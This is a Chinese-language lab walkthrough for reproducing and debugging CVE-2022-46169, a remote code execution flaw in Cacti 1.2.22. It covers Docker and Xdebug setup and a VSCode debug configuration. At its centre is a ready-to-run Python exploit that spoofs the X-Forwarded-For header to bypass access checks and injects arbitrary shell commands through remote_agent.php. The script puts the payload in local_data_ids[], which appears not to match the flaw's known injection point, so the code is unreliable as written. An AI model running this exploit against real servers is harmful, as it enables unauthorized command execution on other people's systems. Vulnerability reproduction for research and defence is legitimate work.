一、环境准备
1. 创建Docker容器
首先,我们需要一个包含PHP 7.4和Cacti的Docker环境:
docker run -it --name cacti_vuln -p 80:80 -p 443:443 php:7.4-apache bash2. 安装Xdebug
pecl install xdebug-3.1.6
docker-php-ext-enable xdebug3. 配置Xdebug
编辑 /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini:
zend_extension=xdebug
xdebug.mode=debug
xdebug.start_with_request=yes
xdebug.client_port=9003
xdebug.client_host=host.docker.internal
xdebug.log=/tmp/xdebug.log4. 安装Cacti
apt update && apt install -y wget unzip
wget https://www.cacti.net/downloads/cacti-1.2.22.zip
unzip cacti-1.2.22.zip -d /var/www/html/
chown -R www-data:www-data /var/www/html/cacti-1.2.225. 重启容器
exit
docker restart cacti_vuln二、漏洞复现
1. 漏洞背景
Cacti 1.2.22及之前版本存在一个远程代码执行漏洞(CVE-2022-46169),攻击者可以通过精心构造的HTTP请求在服务器上执行任意命令。
2. 漏洞利用步骤
1、访问Cacti安装页面完成安装
2、使用以下Python脚本进行漏洞利用:
import requests
import sys
import urllib3
urllib3.disable_warnings()
def exploit(url, cmd):
headers = {
"X-Forwarded-For": "127.0.0.1"
}
payload = f";{cmd}"
params = {
"action": "polldata",
"poller_id": "1",
"host_id": "1",
"local_data_ids[]": payload
}
try:
r = requests.get(f"{url}/remote_agent.php", params=params, headers=headers, verify=False)
print(r.text)
except Exception as e:
print(f"Error: {e}")
if __name__ == "__main__":
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <target_url> <command>")
sys.exit(1)
exploit(sys.argv[1], sys.argv[2])3、执行命令示例:
python exploit.py http://localhost/cacti-1.2.22 "whoami"三、VSCode调试配置
1. 安装PHP Debug扩展
在VSCode中安装PHP Debug扩展。
2. 配置launch.json
{
"version": "0.2.0",
"configurations": [
{
"name": "Listen for Xdebug",
"type": "php",
"request": "launch",
"port": 9003,
"pathMappings": {
"/var/www/html": "${workspaceFolder}"
},
"log": true
}
]
}在remote_agent.php中设置断点